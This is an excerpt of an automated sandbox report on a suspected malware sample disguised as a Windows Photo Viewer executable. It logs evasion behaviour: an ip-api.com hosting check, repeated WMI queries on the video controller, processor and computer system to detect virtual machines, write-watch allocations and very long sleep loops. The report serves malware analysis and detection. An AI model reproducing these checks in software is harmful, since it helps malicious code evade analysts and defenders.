Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Memory allocated: 3270000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Memory allocated: 24F70000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Memory allocated: 24D80000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Memory allocated: 2DB0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Memory allocated: 24960000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Memory allocated: 24800000 memory reserve \| memory write watch

Contains long sleeps (>= 3 min)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 600000
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 599888
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 599776
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 599664
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 599554
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 599443
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 599332
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 599204
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 599076
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 598964
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 598852
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 598741
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 598630
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 598518
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 598391
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 598279
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 598167
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 598056
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 597945
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 597833
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 597715
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 597610
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 597482
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 597370
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 597258
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 597146
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 597034
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 596906
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 596794
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 596682
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 596571
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 596460
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 596348
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 596220
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 596093
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 595981
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 595870
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 595760
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 595647
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 595537
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 595425
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 595300
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 595173
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 595045
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 594933
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 594822
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 594711
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 594599
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 594471
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 594343
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2109
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7791
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3818
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6010
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Window / User API: threadDelayed 387
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Window / User API: threadDelayed 9707

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7092	Thread sleep count: 2109 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7096	Thread sleep count: 7791 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7144	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6192	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7108	Thread sleep count: 3818 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7108	Thread sleep count: 6010 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7044	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -600000s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 4780	Thread sleep count: 387 > 30
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -599888s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -599776s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 4780	Thread sleep count: 134 > 30
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -599664s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -599554s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -599443s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -599332s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 4780	Thread sleep count: 9707 > 30
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -599204s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -599076s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -598964s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -598852s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -598741s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -598630s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -598518s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -598391s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -598279s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -598167s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -598056s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -597945s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -597833s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -597715s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -597610s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -597482s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -597370s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -597258s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -597146s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -597034s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -596906s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -596794s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -596682s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -596571s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -596460s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -596348s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -596220s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -596093s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -595981s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -595870s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -595760s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -595647s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -595537s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -595425s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -595300s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -595173s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -595045s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -594933s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -594822s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -594711s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -594599s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -594471s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168	Thread sleep time: -594343s >= -30000s
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 1172	Thread sleep time: -922337203685477s >= -30000s

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 600000
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 599888
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 599776
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 599664
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 599554
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 599443
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 599332
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 599204
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 599076
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 598964
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 598852
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 598741
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 598630
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 598518
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 598391
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 598279
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 598167
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 598056
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 597945
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 597833
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 597715
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 597610
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 597482
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 597370
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 597258
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 597146
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 597034
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 596906
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 596794
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 596682
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 596571
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 596460
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 596348
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 596220
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 596093
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 595981
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 595870
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 595760
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 595647
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 595537
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 595425
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 595300
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 595173
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 595045
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 594933
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 594822
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 594711
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 594599
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 594471
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 594343
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Pitapats\gimmickry\
